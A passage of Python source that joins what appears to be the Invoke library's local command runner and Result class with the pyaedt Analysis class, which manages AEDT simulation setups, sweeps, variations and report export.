Execute a command on the local system in a subprocess.
.. note::
When Invoke itself is executed without a controlling terminal (e.g.
when ``sys.stdin`` lacks a useful ``fileno``), it's not possible to
present a handle on our PTY to local subprocesses. In such situations,
`Local` will fallback to behaving as if ``pty=False`` (on the theory
that degraded execution is better than none at all) as well as printing
a warning to stderr.
To disable this behavior, say ``fallback=False``.
"""
def __init__(self, context):
super(Local, self).__init__(context)
# Bookkeeping var for pty use case
self.status = None
def should_use_pty(self, pty=False, fallback=True):
use_pty = False
if pty:
use_pty = True
# TODO: pass in & test in_stream, not sys.stdin
if not has_fileno(sys.stdin) and fallback:
if not self.warned_about_pty_fallback:
sys.stderr.write("WARNING: stdin has no fileno; falling back to non-pty execution!\n") # noqa
self.warned_about_pty_fallback = True
use_pty = False
return use_pty
def read_proc_stdout(self, num_bytes):
# Obtain useful read-some-bytes function
if self.using_pty:
# Need to handle spurious OSErrors on some Linux platforms.
try:
data = os.read(self.parent_fd, num_bytes)
except OSError as e:
# Only eat I/O specific OSErrors so we don't hide others
stringified = str(e)
io_errors = (
# The typical default
"Input/output error",
# Some less common platforms phrase it this way
"I/O error",
)
if not any(error in stringified for error in io_errors):
raise
# The bad OSErrors happen after all expected output has
# appeared, so we return a falsey value, which triggers the
# "end of output" logic in code using reader functions.
data = None
else:
data = os.read(self.process.stdout.fileno(), num_bytes)
return data
def read_proc_stderr(self, num_bytes):
# NOTE: when using a pty, this will never be called.
# TODO: do we ever get those OSErrors on stderr? Feels like we could?
return os.read(self.process.stderr.fileno(), num_bytes)
def _write_proc_stdin(self, data):
# NOTE: parent_fd from pty.fork() is a read/write pipe attached to our
# forked process' stdout/stdin, respectively.
fd = self.parent_fd if self.using_pty else self.process.stdin.fileno()
# Try to write, ignoring broken pipes if encountered (implies child
# process exited before the process piping stdin to us finished;
# there's nothing we can do about that!)
try:
return os.write(fd, data)
except OSError as e:
if 'Broken pipe' not in str(e):
raise
def start(self, command, shell, env):
if self.using_pty:
if pty is None: # Encountered ImportError
sys.exit("You indicated pty=True, but your platform doesn't support the 'pty' module!") # noqa
cols, rows = pty_size()
self.pid, self.parent_fd = pty.fork()
# If we're the child process, load up the actual command in a
# shell, just as subprocess does; this replaces our process - whose
# pipes are all hooked up to the PTY - with the "real" one.
if self.pid == 0:
# TODO: both pty.spawn() and pexpect.spawn() do a lot of
# setup/teardown involving tty.setraw, getrlimit, signal.
# Ostensibly we'll want some of that eventually, but if
# possible write tests - integration-level if necessary -
# before adding it!
#
# Set pty window size based on what our own controlling
# terminal's window size appears to be.
# TODO: make subroutine?
winsize = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(sys.stdout.fileno(), termios.TIOCSWINSZ, winsize)
# Use execve for bare-minimum "exec w/ variable # args + env"
# behavior. No need for the 'p' (use PATH to find executable)
# for now.
# TODO: see if subprocess is using equivalent of execvp...
os.execve(shell, [shell, '-c', command], env)
else:
self.process = Popen(
command,
shell=True,
executable=shell,
env=env,
stdout=PIPE,
stderr=PIPE,
stdin=PIPE,
)
@property
def process_is_finished(self):
if self.using_pty:
# NOTE:
# https://github.com/pexpect/ptyprocess/blob/4058faa05e2940662ab6da1330aa0586c6f9cd9c/ptyprocess/ptyprocess.py#L680-L687
# implies that Linux "requires" use of the blocking, non-WNOHANG
# version of this call. Our testing doesn't verify this, however,
# so...
# NOTE: It does appear to be totally blocking on Windows, so our
# issue #351 may be totally unsolvable there. Unclear.
pid_val, self.status = os.waitpid(self.pid, os.WNOHANG)
return pid_val != 0
else:
return self.process.poll() is not None
def returncode(self):
if self.using_pty:
# No subprocess.returncode available; use WIFEXITED/WIFSIGNALED to
# determine which of WEXITSTATUS / WTERMSIG to use.
# TODO: is it safe to just say "call all WEXITSTATUS/WTERMSIG and
# return whichever one of them is nondefault"? Probably not?
# NOTE: doing this in an arbitrary order should be safe since only
# one of the WIF* methods ought to ever return True.
code = None
if os.WIFEXITED(self.status):
code = os.WEXITSTATUS(self.status)
elif os.WIFSIGNALED(self.status):
code = os.WTERMSIG(self.status)
# Match subprocess.returncode by turning signals into negative
# 'exit code' integers.
code = -1 * code
return code
# TODO: do we care about WIFSTOPPED? Maybe someday?
else:
return self.process.returncode
def stop(self):
# No explicit close-out required (so far).
pass
class Result(object):
"""
A container for information about the result of a command execution.
All params are exposed as attributes of the same name and type.
:param str stdout:
The subprocess' standard output.
:param str stderr:
Same as ``stdout`` but containing standard error (unless the process
was invoked via a pty, in which case it will be empty; see
`.Runner.run`.)
:param str encoding:
The string encoding used by the local shell environment.
:param str command:
The command which was executed.
:param str shell:
The shell binary used for execution.
:param dict env:
The shell environment used for execution. (Default is the empty dict,
``{}``, not ``None`` as displayed in the signature.)
:param int exited:
An integer representing the subprocess' exit/return code.
:param bool pty:
A boolean describing whether the subprocess was invoked with a pty or
not; see `.Runner.run`.
:param tuple hide:
A tuple of stream names (none, one or both of ``('stdout', 'stderr')``)
which were hidden from the user when the generating command executed;
this is a normalized value derived from the ``hide`` parameter of
`.Runner.run`.
For example, ``run('command', hide='stdout')`` will yield a `Result`
where ``result.hide == ('stdout',)``; ``hide=True`` or ``hide='both'``
results in ``result.hide == ('stdout', 'stderr')``; and ``hide=False``
(the default) generates ``result.hide == ()`` (the empty tuple.)
.. note::
`Result` objects' truth evaluation is equivalent to their `.ok`
attribute's value. Therefore, quick-and-dirty expressions like the
following are possible::
if run("some shell command"):
do_something()
else:
handle_problem()
However, remember `Zen of Python #2
<http://zen-of-python.info/explicit-is-better-than-implicit.html#2>`_.
"""
# TODO: inherit from namedtuple instead? heh (or: use attrs from pypi)
def __init__(
self,
stdout="",
stderr="",
encoding=None,
command="",
shell="",
env=None,
exited=0,
pty=False,
hide=tuple(),
):
self.stdout = stdout
self.stderr = stderr
self.encoding = encoding
self.command = command
self.shell = shell
self.env = {} if env is None else env
self.exited = exited
self.pty = pty
self.hide = hide
@property
def return_code(self):
"""
An alias for ``.exited``.
"""
return self.exited
def __nonzero__(self):
# NOTE: This is the method that (under Python 2) determines Boolean
# behavior for objects.
return self.ok
def __bool__(self):
# NOTE: And this is the Python 3 equivalent of __nonzero__. Much better
# name...
return self.__nonzero__()
def __str__(self):
if self.exited is not None:
desc = "Command exited with status {}.".format(self.exited)
else:
desc = "Command was not fully executed due to watcher error."
ret = [desc]
for x in ('stdout', 'stderr'):
val = getattr(self, x)
ret.append(u"""=== {} ===
{}
""".format(x, val.rstrip()) if val else u"(no {})".format(x))
return u"\n".join(ret)
def __repr__(self):
# TODO: more? e.g. len of stdout/err? (how to represent cleanly in a
# 'x=y' format like this? e.g. '4b' is ambiguous as to what it
# represents)
template = "<Result cmd={!r} exited={}>"
return template.format(self.command, self.exited)
@property
def ok(self):
"""
A boolean equivalent to ``exited == 0``.
"""
return self.exited == 0
@property
def failed(self):
"""
The inverse of ``ok``.
I.e., ``True`` if the program exited with a nonzero return code, and
``False`` otherwise.
"""
return not self.ok
def normalize_hide(val):
hide_vals = (None, False, 'out', 'stdout', 'err', 'stderr', 'both', True)
if val not in hide_vals:
err = "'hide' got {!r} which is not in {!r}"
raise ValueError(err.format(val, hide_vals))
if val in (None, False):
hide = ()
elif val in ('both', True):
hide = ('stdout', 'stderr')
elif val == 'out':
hide = ('stdout',)
elif val == 'err':
hide = ('stderr',)
else:
hide = (val,)
return hide
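# For reference, the normalization implemented above maps as follows:
#   normalize_hide(None)   -> ()
#   normalize_hide(False)  -> ()
#   normalize_hide(True)   -> ('stdout', 'stderr')
#   normalize_hide('both') -> ('stdout', 'stderr')
#   normalize_hide('out')  -> ('stdout',)   normalize_hide('stdout') -> ('stdout',)
#   normalize_hide('err')  -> ('stderr',)   normalize_hide('stderr') -> ('stderr',)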
Analysis.py
"""
This module contains the ``analysis`` class.
It includes common classes for file management and messaging and all
calls to AEDT modules like the modeler, mesh, postprocessing, and setup.
"""
from __future__ import absolute_import # noreorder
import os
import shutil
import threading
import warnings
from collections import OrderedDict
from pyaedt.application.Design import Design
from pyaedt.application.JobManager import update_hpc_option
from pyaedt.generic.constants import AXIS
from pyaedt.generic.constants import CoordinateSystemAxis
from pyaedt.generic.constants import CoordinateSystemPlane
from pyaedt.generic.constants import GRAVITY
from pyaedt.generic.constants import GravityDirection
from pyaedt.generic.constants import PLANE
from pyaedt.generic.constants import Plane
from pyaedt.generic.constants import SETUPS
from pyaedt.generic.constants import SOLUTIONS
from pyaedt.generic.constants import VIEW
from pyaedt.generic.general_methods import filter_tuple
from pyaedt.generic.general_methods import generate_unique_name
from pyaedt.generic.general_methods import pyaedt_function_handler
from pyaedt.modules.Boundary import NativeComponentObject
from pyaedt.modules.DesignXPloration import OptimizationSetups
from pyaedt.modules.DesignXPloration import ParametricSetups
from pyaedt.modules.MaterialLib import Materials
from pyaedt.modules.SolveSetup import Setup
class Analysis(Design, object):
"""Contains all common analysis functions.
This class is inherited in the caller application and is accessible through it (for example, ``hfss.method_name``).
It is automatically initialized by a call from an application, such as HFSS or Q3D.
See the application function for its parameter descriptions.
Parameters
----------
application : str
Application that is to initialize the call.
projectname : str
Name of the project to select or the full path to the project
or AEDTZ archive to open.
designname : str
Name of the design to select.
solution_type : str
Solution type to apply to the design.
setup_name : str
Name of the setup to use as the nominal.
specified_version : str
Version of AEDT to use.
non_graphical : bool
Whether to run AEDT in non-graphical mode.
new_desktop_session : bool
Whether to launch an instance of AEDT in a new thread, even if
another instance of the ``specified_version`` is active on the
machine.
close_on_exit : bool
Whether to release AEDT on exit.
student_version : bool
Whether to enable the student version of AEDT.
aedt_process_id : int, optional
Only used when ``new_desktop_session = False``, specifies by process ID which instance
of Electronics Desktop to point PyAEDT at.
"""
def __init__(
self,
application,
projectname,
designname,
solution_type,
setup_name,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
machine="",
port=0,
aedt_process_id=None,
):
self.setups = []
Design.__init__(
self,
application,
projectname,
designname,
solution_type,
specified_version,
non_graphical,
new_desktop_session,
close_on_exit,
student_version,
machine,
port,
aedt_process_id,
)
self.logger.info("Design Loaded")
self._setup = None
if setup_name:
self.analysis_setup = setup_name
self._materials = Materials(self)
self.logger.info("Materials Loaded")
self._available_variations = self.AvailableVariations(self)
if self.design_type != "Maxwell Circuit":
self.setups = [self.get_setup(setup_name) for setup_name in self.setup_names]
self.parametrics = ParametricSetups(self)
self.optimizations = OptimizationSetups(self)
self._native_components = []
self.SOLUTIONS = SOLUTIONS()
self.SETUPS = SETUPS()
self.AXIS = AXIS()
self.PLANE = PLANE()
self.VIEW = VIEW()
self.GRAVITY = GRAVITY()
@property
def native_components(self):
"""Native Component dictionary.
Returns
-------
dict[str, :class:`pyaedt.modules.Boundaries.NativeComponentObject`]
"""
if not self._native_components:
self._native_components = self._get_native_data()
return self._native_components
@property
def output_variables(self):
"""List of output variables.
Returns
-------
list of str
References
----------
>>> oModule.GetOutputVariables()
"""
return self.ooutput_variable.GetOutputVariables()
@property
def materials(self):
"""Materials in the project.
Returns
-------
:class:`pyaedt.modules.MaterialLib.Materials`
Materials in the project.
"""
return self._materials
@property
def Position(self):
"""Position of the object.
Returns
-------
type
Position object.
"""
return self.modeler.Position
@property
def available_variations(self):
"""Available variation object.
Returns
-------
:class:`pyaedt.application.Analysis.Analysis.AvailableVariations`
Available variation object.
"""
return self._available_variations
@property
def CoordinateSystemAxis(self):
"""Coordinate system axis constant.
.. deprecated:: 0.4.8
Use :attr:`AXIS` instead.
Returns
-------
:class:`pyaedt.modeler.constants.AXIS`
Coordinate system axis constants tuple (.X, .Y, .Z).
"""
return CoordinateSystemAxis()
@property
def CoordinateSystemPlane(self):
"""Coordinate system plane constants.
.. deprecated:: 0.4.8
Use :attr:`PLANE` instead.
Returns
-------
:class:`pyaedt.modeler.constants.PLANE`
Coordinate system plane constants tuple (.XY, .YZ, .XZ).
"""
return CoordinateSystemPlane()
@property
def View(self):
"""Planes.
.. deprecated:: 0.4.8
Use :attr:`VIEW` instead.
Returns
-------
:class:`pyaedt.modeler.constants.PLANE`
Coordinate system plane string tuple ("XY", "YZ", "XZ").
"""
return Plane()
@property
def GravityDirection(self):
"""Gravity direction.
.. deprecated:: 0.4.8
Use :attr:`GRAVITY` instead.
Returns
-------
tuple
Gravity direction tuple (XNeg, YNeg, ZNeg, XPos, YPos, ZPos).
"""
return GravityDirection()
@property
def modeler(self):
"""Modeler.
Returns
-------
:class:`pyaedt.modeler.Modeler.Modeler`
Modeler object.
"""
return self._modeler
@property
def mesh(self):
"""Mesh.
Returns
-------
:class:`pyaedt.modules.Mesh.Mesh`
Mesh object.
"""
return self._mesh
@property
def post(self):
"""PostProcessor.
Returns
-------
:class:`pyaedt.modules.AdvancedPostProcessing.PostProcessor`
PostProcessor object.
"""
return self._post
@property
def analysis_setup(self):
"""Analysis setup.
Returns
-------
str
Name of the active or first analysis setup.
References
----------
>>> oModule.GetAllSolutionSetups()
"""
if self._setup:
return self._setup
elif self.existing_analysis_setups:
return self.existing_analysis_setups[0]
else:
self._setup = None
return self._setup
@analysis_setup.setter
def analysis_setup(self, setup_name):
setup_list = self.existing_analysis_setups
if setup_list:
assert setup_name in setup_list, "Invalid setup name {}".format(setup_name)
self._setup = setup_name
else:
# No setups exist yet; keep the requested name so it becomes the active setup once created.
self._setup = setup_name
@property
def existing_analysis_sweeps(self):
"""Existing analysis sweeps.
Returns
-------
list of str
List of all analysis sweeps in the design.
References
----------
>>> oModule.GetAllSolutionNames
>>> oModule.GetSweeps
"""
setup_list = self.existing_analysis_setups
sweep_list = []
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
sweep_list = self.oanalysis.GetAllSolutionNames()
sweep_list = [i for i in sweep_list if "Adaptive Pass" not in i]
sweep_list.reverse()
else:
for el in setup_list:
sweeps = []
setuptype = self.design_solutions.default_adaptive
if setuptype:
sweep_list.append(el + " : " + setuptype)
else:
sweep_list.append(el)
if self.design_type in ["HFSS 3D Layout Design"]:
sweeps = self.oanalysis.GetAllSolutionNames()
elif self.solution_type not in ["Eigenmode"]:
try:
sweeps = list(self.oanalysis.GetSweeps(el))
except:
sweeps = []
for sw in sweeps:
if el + " : " + sw not in sweep_list:
sweep_list.append(el + " : " + sw)
return sweep_list
@property
def nominal_adaptive(self):
"""Nominal adaptive sweep.
Returns
-------
str
Name of the nominal adaptive sweep.
References
----------
>>> oModule.GetAllSolutionNames
>>> oModule.GetSweeps
"""
if len(self.existing_analysis_sweeps) > 0:
return self.existing_analysis_sweeps[0]
else:
return ""
@property
def nominal_sweep(self):
"""Nominal sweep.
Returns
-------
str
Name of the last adaptive sweep if a sweep is available or
the name of the nominal adaptive sweep if present.
References
----------
>>> oModule.GetAllSolutionNames
>>> oModule.GetSweeps
"""
if len(self.existing_analysis_sweeps) > 1:
return self.existing_analysis_sweeps[1]
else:
return self.nominal_adaptive
@property
def existing_analysis_setups(self):
"""Existing analysis setups.
Returns
-------
list of str
List of all analysis setups in the design.
References
----------
>>> oModule.GetSetups
"""
setups = list(self.oanalysis.GetSetups())
return setups
@property
def setup_names(self):
"""Setup names.
Returns
-------
list of str
List of names of all analysis setups in the design.
References
----------
>>> oModule.GetSetups
"""
return self.oanalysis.GetSetups()
@property
def SimulationSetupTypes(self):
"""Simulation setup types.
Returns
-------
SETUPS
List of all simulation setup types categorized by application.
"""
return SETUPS()
@property
def SolutionTypes(self):
"""Solution types.
Returns
-------
SOLUTIONS
List of all solution type categorized by application.
"""
return SOLUTIONS()
@property
def excitations(self):
"""Get all excitation names.
Returns
-------
list
List of excitation names. Excitations with multiple modes will return one
excitation for each mode.
References
----------
>>> oModule.GetExcitations
"""
try:
list_names = list(self.oboundary.GetExcitations())
del list_names[1::2]
return list_names
except:
return []
@pyaedt_function_handler()
def get_excitations_name(self):
"""Get all excitation names.
.. deprecated:: 0.4.27
Use :func:`excitations` property instead.
Returns
-------
list
List of excitation names. Excitations with multiple modes will return one
excitation for each mode.
References
----------
>>> oModule.GetExcitations
"""
warnings.warn("`get_excitations_name` is deprecated. Use `excitations` property instead.", DeprecationWarning)
return self.excitations
@pyaedt_function_handler()
def get_traces_for_plot(
self,
get_self_terms=True,
get_mutual_terms=True,
first_element_filter=None,
second_element_filter=None,
category="dB(S",
):
"""Retrieve a list of traces of specified designs ready to use in plot reports.
Parameters
----------
get_self_terms : bool, optional
Whether to return self terms. The default is ``True``.
get_mutual_terms : bool, optional
Whether to return mutual terms. The default is ``True``.
first_element_filter : str, optional
Filter to apply to the first element of the equation.
This parameter accepts ``*`` and ``?`` as special characters. The default is ``None``.
second_element_filter : str, optional
Filter to apply to the second element of the equation.
This parameter accepts ``*`` and ``?`` as special characters. The default is ``None``.
category : str
Plot category name as in the report (including operator).
The default is ``"dB(S"``, which is the plot category name for capacitance.
Returns
-------
list
List of traces of specified designs ready to use in plot reports.
Examples
--------
>>> from pyaedt import Q3d
>>> hfss = Q3d(project_path)
>>> hfss.get_traces_for_plot(first_element_filter="Bo?1",
... second_element_filter="GND*", category="dB(S")
"""
if not first_element_filter:
first_element_filter = "*"
if not second_element_filter:
second_element_filter = "*"
list_output = []
end_str = ")" * (category.count("(") + 1)
if get_self_terms:
for el in self.excitations:
value = "{}({},{}{}".format(category, el, el, end_str)
if filter_tuple(value, first_element_filter, second_element_filter):
list_output.append(value)
if get_mutual_terms:
for el1 in self.excitations:
for el2 in self.excitations:
if el1 != el2:
value = "{}({},{}{}".format(category, el1, el2, end_str)
if filter_tuple(value, first_element_filter, second_element_filter):
list_output.append(value)
return list_output
@pyaedt_function_handler()
def analyze_all(self):
"""Analyze all setups in a design.
Returns
-------
bool
``True`` when simulation is finished.
"""
self.odesign.AnalyzeAll()
return True
@pyaedt_function_handler()
def list_of_variations(self, setup_name=None, sweep_name=None):
"""Retrieve a list of active variations for input setup.
Parameters
----------
setup_name : str, optional
Setup name. The default is ``None``, in which case the nominal adaptive
is used.
sweep_name : str, optional
Sweep name. The default is ``None``, in which case the nominal adaptive
is used.
Returns
-------
list
List of active variations for input setup.
References
----------
>>> oModule.ListVariations
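Examples
--------
Illustrative call; the setup and sweep names are placeholders that must exist in the design:
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> hfss.list_of_variations("Setup1", "Sweep1")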
"""
if not setup_name and ":" in self.nominal_sweep:
setup_name = self.nominal_adaptive.split(":")[0].strip()
elif not setup_name:
self.logger.warning("No Setup defined.")
return False
if not sweep_name and ":" in self.nominal_sweep:
sweep_name = self.nominal_adaptive.split(":")[1].strip()
elif not sweep_name:
self.logger.warning("No Sweep defined.")
return False
if (
self.solution_type == "HFSS3DLayout"
or self.solution_type == "HFSS 3D Layout Design"
or self.design_type == "2D Extractor"
):
try:
return list(self.osolution.ListVariations("{0} : {1}".format(setup_name, sweep_name)))
except:
return [""]
else:
try:
return list(self.odesign.ListVariations("{0} : {1}".format(setup_name, sweep_name)))
except:
return [""]
@pyaedt_function_handler()
def export_results(self, analyze=False, export_folder=None):
"""Export all available reports to a file, including sNp, profile, and convergence.
Parameters
----------
analyze : bool, optional
Whether to analyze before exporting. Solutions must be present for the design. The default is ``False``.
export_folder : str, optional
Full path to the project folder. The default is ``None``, in which case the
working directory is used.
Returns
-------
list
List of all exported files.
References
----------
>>> oModule.GetAllPortsList
>>> oDesign.ExportProfile
>>> oModule.ExportToFile
>>> oModule.ExportConvergence
>>> oModule.ExportNetworkData
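Examples
--------
Minimal illustrative call, exporting every available report for an already solved design to the working directory:
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> exported = hfss.export_results()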
"""
exported_files = []
if not export_folder:
export_folder = self.working_directory
if analyze:
self.analyze_all()
setups = self.oanalysis.GetSetups()
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
excitations = len(self.oexcitation.GetAllPortsList())
elif self.design_type == "2D Extractor":
excitations = self.oboundary.GetNumExcitations("SignalLine")
elif self.design_type == "Q3D Extractor":
excitations = self.oboundary.GetNumExcitations("Source")
else:
excitations = self.oboundary.GetNumExcitations()
reportnames = self.post.oreportsetup.GetAllReportNames()
for report_name in reportnames:
name_no_space = report_name.replace(" ", "_")
self.post.oreportsetup.UpdateReports([str(report_name)])
export_path = os.path.join(
export_folder, "{0}_{1}_{2}.csv".format(self.project_name, self.design_name, name_no_space)
)
try:
self.post.oreportsetup.ExportToFile(str(report_name), export_path)
self.logger.info("Export Data: {}".format(export_path))
except:
pass
exported_files.append(export_path)
for s in setups:
sweeps = self.oanalysis.GetSweeps(s)
if len(sweeps) == 0:
sweeps = ["LastAdaptive"]
for sweep in sweeps:
variation_array = self.list_of_variations(s, sweep)
if len(variation_array) == 1:
export_path = os.path.join(export_folder, "{}.prof".format(self.project_name))
result = self.export_profile(s, variation_array[0], export_path)
if result:
exported_files.append(export_path)
export_path = os.path.join(export_folder, "{}.conv".format(self.project_name))
result = self.export_convergence(s, variation_array[0], export_path)
if result:
exported_files.append(export_path)
if self.solution_type in ["HFSS3DLayout", "HFSS 3D Layout Design", "HFSS", "Circuit"]:
try:
export_path = os.path.join(
export_folder, "{0}.s{1}p".format(self.project_name, excitations)
)
self.osolution.ExportNetworkData(
variation_array[0],
["{0}:{1}".format(s, sweep)],
3,
export_path,
["All"],
True,
50,
"S",
-1,
0,
15,
True,
False,
False,
)
exported_files.append(export_path)
self.logger.info("Exported Touchstone: %s", export_path)
except:
self.logger.warning("Export SnP failed: no solutions found")
else:
varCount = 0
for variation in variation_array:
varCount += 1
export_path = os.path.join(export_folder, "{0}_{1}.prof".format(self.project_name, varCount))
result = self.export_profile(s, variation, export_path)
if result:
exported_files.append(export_path)
export_path = os.path.join(export_folder, "{0}_{1}.conv".format(self.project_name, varCount))
self.logger.info("Export Convergence: %s", export_path)
result = self.export_convergence(s, variation, export_path)
if result:
exported_files.append(export_path)
if self.solution_type in ["HFSS3DLayout", "HFSS 3D Layout Design", "HFSS", "Circuit"]:
try:
export_path = os.path.join(
export_folder, "{0}_{1}.s{2}p".format(self.project_name, varCount, excitations)
)
self.logger.info("Export SnP: {}".format(export_path))
self.osolution.ExportNetworkData(
variation,
["{0}:{1}".format(s, sweep)],
3,
export_path,
["All"],
True,
50,
"S",
-1,
0,
15,
True,
False,
False,
)
exported_files.append(export_path)
self.logger.info("Exported Touchstone: %s", export_path)
except:
self.logger.warning("Export SnP failed: no solutions found")
return exported_files
@pyaedt_function_handler()
def export_convergence(self, setup_name, variation_string="", file_path=None):
"""Export a solution convergence to a file.
Parameters
----------
setup_name : str
Setup name. For example, ``'Setup1'``.
variation_string : str
Variation string with values. For example, ``'radius=3mm'``.
file_path : str, optional
Full path to the output file. The default is ``None``, in which
case the working directory is used.
Returns
-------
str
File path if created.
References
----------
>>> oModule.ExportConvergence
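Examples
--------
Minimal illustrative call; ``"Setup1"`` is a placeholder and must exist in the design:
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> hfss.export_convergence("Setup1")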
"""
if " : " in setup_name:
setup_name = setup_name.split(" : ")[0]
if not file_path:
file_path = os.path.join(self.working_directory, generate_unique_name("Convergence") + ".prop")
if not variation_string:
val_str = []
for el, val in self.available_variations.nominal_w_values_dict.items():
val_str.append("{}={}".format(el, val))
variation_string = ",".join(val_str)
if self.design_type == "2D Extractor":
for setup in self.setups:
if setup.name == setup_name:
if "CGDataBlock" in setup.props:
file_path = os.path.splitext(file_path)[0] + "CG" + os.path.splitext(file_path)[1]
self.odesign.ExportConvergence(setup_name, variation_string, "CG", file_path, True)
self.logger.info("Export Convergence to %s", file_path)
if "RLDataBlock" in setup.props:
file_path = os.path.splitext(file_path)[0] + "RL" + os.path.splitext(file_path)[1]
self.odesign.ExportConvergence(setup_name, variation_string, "RL", file_path, True)
self.logger.info("Export Convergence to %s", file_path)
break
elif self.design_type == "Q3D Extractor":
for setup in self.setups:
if setup.name == setup_name:
if "Cap" in setup.props:
file_path = os.path.splitext(file_path)[0] + "CG" + os.path.splitext(file_path)[1]
self.odesign.ExportConvergence(setup_name, variation_string, "CG", file_path, True)
self.logger.info("Export Convergence to %s", file_path)
if "AC" in setup.props:
file_path = os.path.splitext(file_path)[0] + "ACRL" + os.path.splitext(file_path)[1]
self.odesign.ExportConvergence(setup_name, variation_string, "AC RL", file_path, True)
self.logger.info("Export Convergence to %s", file_path)
if "DC" in setup.props:
file_path = os.path.splitext(file_path)[0] + "DC" + os.path.splitext(file_path)[1]
self.odesign.ExportConvergence(setup_name, variation_string, "DC RL", file_path, True)
self.logger.info("Export Convergence to %s", file_path)
break
else:
self.odesign.ExportConvergence(setup_name, variation_string, file_path)
self.logger.info("Export Convergence to %s", file_path)
return file_path
@pyaedt_function_handler()
def _get_native_data(self):
"""Retrieve Native Components data."""
boundaries = []
try:
data_vals = self.design_properties["ModelSetup"]["GeometryCore"]["GeometryOperations"][
"SubModelDefinitions"
]["NativeComponentDefinition"]
if not isinstance(data_vals, list) and isinstance(data_vals, (OrderedDict, dict)):
boundaries.append(
NativeComponentObject(
self,
data_vals["NativeComponentDefinitionProvider"]["Type"],
data_vals["BasicComponentInfo"]["ComponentName"],
data_vals,
)
)
for ds in data_vals:
try:
if isinstance(ds, (OrderedDict, dict)):
boundaries.append(
NativeComponentObject(
self,
ds["NativeComponentDefinitionProvider"]["Type"],
ds["BasicComponentInfo"]["ComponentName"],
ds,
)
)
except:
pass
except:
pass
return boundaries
class AvailableVariations(object):
def __init__(self, app):
"""Contains available variations.
Parameters
----------
app :
Inherited parent object.
Returns
-------
object
Parent object.
"""
self._app = app
@property
def variables(self):
"""Variables.
Returns
-------
list of str
List of names of independent variables.
"""
return [i for i in self._app.variable_manager.independent_variables]
@pyaedt_function_handler()
def variations(self, setup_sweep=None):
"""Variations.
Parameters
----------
setup_sweep : str, optional
Setup name with the sweep to search for variations on. The default is ``None``.
Returns
-------
list of lists
List of variation families.
References
----------
>>> oModule.GetAvailableVariations
"""
vs = self.get_variation_strings(setup_sweep)
families = []
if vs:
for v in vs:
variations = v.split(" ")
family = []
for el in self.variables:
family.append(el + ":=")
i = 0
while i < len(variations):
if variations[i][0 : len(el)] == el:
family.append([variations[i][len(el) + 2 : -1]])
i += 1
families.append(family)
return families
@pyaedt_function_handler()
def get_variation_strings(self, setup_sweep=None):
"""Return variation strings.
Parameters
----------
setup_sweep : str, optional
Setup name with the sweep to search for variations on. The default is ``None``.
Returns
-------
list of str
List of variation families.
References
----------
>>> oModule.GetAvailableVariations
"""
if not setup_sweep:
setup_sweep = self._app.existing_analysis_sweeps[0]
return self._app.osolution.GetAvailableVariations(setup_sweep)
@property
def nominal(self):
"""Nominal."""
families = []
for el in self.variables:
families.append(el + ":=")
families.append(["Nominal"])
return families
@property
def nominal_w_values(self):
"""Nominal with values.
References
----------
>>> oDesign.GetChildObject('Variables').GetChildNames
>>> oDesign.GetVariables
>>> oDesign.GetVariableValue
>>> oDesign.GetNominalVariation"""
families = []
for k, v in list(self._app.variable_manager.independent_variables.items()):
families.append(k + ":=")
families.append([v.expression])
return families
@property
def nominal_w_values_dict(self):
"""Nominal with values in a dictionary.
References
----------
>>> oDesign.GetChildObject('Variables').GetChildNames
>>> oDesign.GetVariables
>>> oDesign.GetVariableValue
>>> oDesign.GetNominalVariation"""
families = {}
for k, v in list(self._app.variable_manager.independent_variables.items()):
families[k] = v.expression
return families
@property
def all(self):
"""List of all independent variables with `["All"]` value."""
families = []
for el in self.variables:
families.append(el + ":=")
families.append(["All"])
return families
class AxisDir(object):
"""Contains constants for the axis directions."""
(XNeg, YNeg, ZNeg, XPos, YPos, ZPos) = range(0, 6)
@pyaedt_function_handler()
def get_setups(self):
"""Retrieve setups.
Returns
-------
list of str
List of names of all setups.
References
----------
>>> oModule.GetSetups
"""
setups = self.oanalysis.GetSetups()
return list(setups)
@pyaedt_function_handler()
def get_nominal_variation(self):
"""Retrieve the nominal variation.
Returns
-------
list of str
List of nominal variations.
"""
return self.available_variations.nominal
@pyaedt_function_handler()
def get_sweeps(self, name):
"""Retrieve all sweeps for a setup.
Parameters
----------
name : str
Name of the setup.
Returns
-------
list of str
List of names of all sweeps for the setup.
References
----------
>>> oModule.GetSweeps
"""
sweeps = self.oanalysis.GetSweeps(name)
return list(sweeps)
@pyaedt_function_handler()
def export_parametric_results(self, sweepname, filename, exportunits=True):
"""Export a list of all parametric variations solved for a sweep to a CSV file.
Parameters
----------
sweepname : str
Name of the optimetrics sweep.
filename : str
Full path and name for the CSV file.
exportunits : bool, optional
Whether to export units with the value. The default is ``True``. When ``False``,
only the value is exported.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.ExportParametricResults
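Examples
--------
Illustrative call; the optimetrics sweep name and CSV path are placeholders:
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> hfss.export_parametric_results("ParametricSetup1", "C:/Temp/variations.csv")
True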
"""
self.ooptimetrics.ExportParametricResults(sweepname, filename, exportunits)
return True
@pyaedt_function_handler()
def analyze_from_initial_mesh(self):
"""Revert the solution to the initial mesh and re-run the solve.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.RevertSetupToInitial
>>> oDesign.Analyze
"""
self.oanalysis.RevertSetupToInitial(self._setup)
self.analyze_nominal()
return True
@pyaedt_function_handler()
def analyse_nominal(self):
"""Solve the nominal design.
.. deprecated:: 0.4.0
Use :func:`Analysis.analyze_nominal` instead.
"""
warnings.warn("`analyse_nominal` is deprecated. Use `analyze_nominal` instead.", DeprecationWarning)
self.analyze_nominal()
@pyaedt_function_handler()
def analyze_nominal(self, num_cores=None, num_tasks=None, num_gpu=None, acf_file=None, use_auto_settings=True):
"""Solve the nominal design.
Parameters
----------
num_cores : int, optional
Number of simulation cores.
num_tasks : int, optional
Number of simulation tasks.
num_gpu : int, optional
Number of simulation graphic processing units to use.
acf_file : str, optional
Full path to the custom ACF file.
